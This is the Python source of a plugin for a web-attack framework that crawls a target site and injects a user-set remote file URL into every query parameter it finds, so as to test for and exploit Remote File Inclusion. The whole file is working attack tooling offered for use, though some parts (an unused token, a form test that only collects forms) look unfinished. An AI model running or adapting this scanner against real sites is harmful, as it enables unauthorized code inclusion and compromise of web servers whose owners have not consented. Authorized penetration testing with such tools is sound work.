#!/usr/bin/env python

#import threading
import Queue
import urllib

from shelob import Shelob
from colors import * #@UnusedWildImport

class RfiModule():

    def __init__(self):
        self.targets = Queue.Queue()
        self.spider = Shelob(self.targets)
        self.url = None
        self.payload = None
        self.token = '123abc'
        self.tokenUrl = None
        self.restrict = True
        self.parameters = {'payload': 'Set a file to automatically include if a vulnerability is found.',
                           'url': 'Url where the spider starts.',
                           'restrict': 'Keep spider on a single domain.',
                           'tokenurl': 'The URL for the test file'
                           }
        
    def splash(self):
        print bold+C+"[*] "+W+"Successfully Loaded the Remote File Inclusion Plugin!"
        
    def execute(self):
        if self.url == None:
            print bold+R+'[!]'+W+' PEBKAC: You must set the url parameter.'
            return
        if self.tokenUrl == None:
            print bold+R+'[!]'+W+' PEBKAC: You must set the tokenUrl parameter.'
            return
        self.__testLinks__()
        self.__testForms__()
    
    def __testForms__(self):
        self.spider.getPageForms(self.url)
        
    def __testLinks__(self):
        self.spider.getPageLinks(self.url)
        print bold+C+'[*]'+W+' Found %d possible targets.' % self.targets.qsize()
        while not self.targets.empty():
            url = self.targets.get()
            self.exploitUrl(url)
    
    def exploitUrl(self, url):
        print bold+C+'[*]'+W+' Testing:', url
        try:
            url, parameters = self.getUrlParameters(url)
            for parameter in parameters.keys():
                request = parameters
                request[parameter] = self.payload
                get = urllib.urlencode(request)
                print bold+C+'[*]'+W+' Attempt: ', url+'?'+get
                try:
                    self.spider.openPage(url+'?'+get)
                except:
                    print bold+R+'[!]'+W+' Server responded with a 404.'
        except:
            print bold+'[*]'+W+' Url is not injectable.'

    def getUrlParameters(self, url):
        url = urllib.unquote(url)
        if not '?' in url:
            return
        target = {}
        parameters = url[url.find('?')+1:].split('&')
        for entry in parameters:
            name = entry.split('=')
            target[name[0]] = name[1]
        return url[:url.find('?')], target

    def set(self, option, value):
        if option.lower() == 'url':
            self.url = value
        elif option.lower() == 'restrict':
            if value.lower() == 'true':
                self.restrict = True
            elif value == 'false':
                self.restrict = False
        elif option.lower() == 'tokenurl':
            self.tokenUrl = value
        elif option.lower() == 'payload':
            self.payload = value
        
def loadPlugin():
    return RfiModule()

